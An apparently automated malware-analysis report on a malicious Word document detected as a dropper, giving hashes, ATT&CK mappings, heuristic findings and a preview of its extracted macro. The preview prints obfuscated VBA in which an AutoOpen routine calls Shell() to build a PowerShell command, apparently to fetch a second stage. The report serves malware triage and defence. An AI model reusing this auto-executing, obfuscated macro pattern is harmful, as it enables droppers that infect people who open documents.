Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 80f7dc1b6fc97bce…

MALICIOUS

Office (OLE)

Size: 107.5 KB
Created: 2018-06-12 16:57:00
Authoring application: Microsoft Office Word
First seen: 2018-07-04
MD5: 8403917fe2e4c330468b6c53941a6705
SHA-1: 899d945883c041424f8992f3b12f9916963727bd
SHA-256: 80f7dc1b6fc97bcefecdf603b126715e074e6dca832a286cb10f7de6ba07f268
212 Risk Score

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The file contains VBA macros, including an AutoOpen subroutine, a common technique for initial execution in malicious documents. The critical heuristic for a Shell() call in VBA fired, which together with the critical ClamAV detection indicates the macro is designed to execute a command. The script attempts to construct a command line that includes 'powershell.exe', suggesting it downloads and executes a second-stage payload.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6582733-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6582733-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
    Matched line in script
    kphAm = Tan(18752)
    YVSaMwprp = PQXYU + Shell(wUYPirUEHzj + Chr(jYjlQOo + vbKeyP + OnWzJaIkz) + "owers" + lwYWqPK + cGAOOW + hUPvhqRSlZ + NZCjzLtKR + bJWklbffJkO + NfkhASQMB, 74929 - 74929)
    sNIZAV = Tan(78284)
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script
    End Function
    Sub Autoopen()
    On Error Resume Next
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14354 bytes
SHA-256: 489464b6f857951377de58ae34b851b6917248275d23dbcb6651f85796e5d0a7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
296 of 589 identifiers look randomly generated (e.g. 'ZgBMAEEAdABlAFM') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "dZYNlkqmVlnSTo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function YVSaMwprp()
On Error Resume Next
dkCXw = Tan(39429)
OsMHK = IfYHXt
rDJcfm = CDbl(VcnRVj)
JNwur = wlqzC
lXnJiO = Hex(BZZbZ * ChrW(LfhlFv + Int(bozRZM * Rnd(60803)) * oFNKa * Log(64638 * RhTFD - hhjmY + Fix(51))))
frOzl = Tan(8130)
WzXVj = Tan(41638)
fNTMRz = LOASz
QtHQfB = CDbl(ziaFc)
JLDtL = jUpUNW
ZrUdO = Hex(lMAcpH * ChrW(iLjAnN + Int(LqzHUo * Rnd(64812)) * XaYtt * Log(21285 * SiBLXr - IiOlVC + Fix(51))))
kphAm = Tan(18752)
YVSaMwprp = PQXYU + Shell(wUYPirUEHzj + Chr(jYjlQOo + vbKeyP + OnWzJaIkz) + "owers" + lwYWqPK + cGAOOW + hUPvhqRSlZ + NZCjzLtKR + bJWklbffJkO + NfkhASQMB, 74929 - 74929)
sNIZAV = Tan(78284)
DvOiG = EwbptR
QtjSfs = CDbl(lrtGBs)
RtlXWE = iSXqvf
qGKtsB = Hex(UYGUcC * ChrW(MBHdNS + Int(FpRXMw * Rnd(72136)) * McjMGv * Log(70982 * NIrwwU - CtCuSQ + Fix(51))))
NhNsl = Tan(31402)
End Function
Sub Autoopen()
On Error Resume Next
WfCqtM = Tan(59333)
QvsbSu = WUqkL
dJDTK = CDbl(OBzNKU)
rdoHDI = RdHCqz
sLsBA = Hex(dsWwX * ChrW(PPjQih + Int(bCrhM * Rnd(75712)) * LzACBd * Log(24841 * WqGLJP - wGqkU + Fix(51))))
jiMZVi = Tan(42803)
YVSaMwprp
BdjOZ = Tan(88014)
rUztVn = sJWXrO
krbSi = CDbl(Oodfuq)
VNazk = jHmtq
FqpCCz = Hex(IOQlFw * ChrW(SRDrRz + Int(fYfjZm * Rnd(42661)) * wwwkTd * Log(71143 * laiDi - FbUBuD + Fix(51))))
EvbrU = Tan(49948)
End Sub

